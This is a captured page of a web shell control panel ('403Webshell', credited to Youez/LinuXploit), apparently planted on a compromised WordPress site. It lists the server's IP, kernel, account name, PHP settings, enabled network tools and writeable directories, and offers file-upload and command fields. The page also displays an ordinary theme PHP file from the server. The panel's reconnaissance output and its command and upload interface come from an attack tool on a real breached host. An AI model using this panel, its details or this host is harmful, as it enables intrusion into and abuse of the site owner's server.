403Webshell
Server IP : 198.38.94.67  /  Your IP : 216.73.217.178
Web Server : LiteSpeed
System : Linux d6054.dxb1.stableserver.net 5.14.0-570.25.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 9 04:57:09 EDT 2025 x86_64
User : azfilmst ( 1070)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/azfilmst/public_html/wp-content/themes/frames/framework/core/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/azfilmst/public_html/wp-content/themes/frames/framework/core/haru_reduxframework.php
<?php
/**
 * @package    HaruTheme
 * @version    1.0.0
 * @author     Administrator <admin@harutheme.com>
 * @copyright  Copyright (c) 2017, HaruTheme
 * @license    http://opensource.org/licenses/gpl-2.0.php GPL v2 or later
 * @link       http://harutheme.com
*/

// Load the embedded Redux Framework - use this to override redux core
if ( file_exists( WP_PLUGIN_DIR . '/redux-framework/ReduxCore/framework.php') ) {
    require_once WP_PLUGIN_DIR . '/redux-framework/ReduxCore/framework.php';
}

// Use this to load extensions for Redux as custom fields,...
if ( true == haru_check_core_plugin_status() ) {
	if ( file_exists( WP_PLUGIN_DIR . '/haru-frames/core/redux-extensions/loader.php') ) {
	    require_once WP_PLUGIN_DIR . '/haru-frames/core/redux-extensions/loader.php';
	}
}

if ( ! class_exists( 'HaruReduxFramework' ) && class_exists( 'ReduxFramework' ) ) { // Fixed for bug if not install redux framework
    class HaruReduxFramework extends ReduxFramework {
        // We can override ReduxFramework here
    }

    do_action( 'redux/init', HaruReduxFramework::init() );
}

Youez - 2016 - github.com/yon3zu
LinuXploit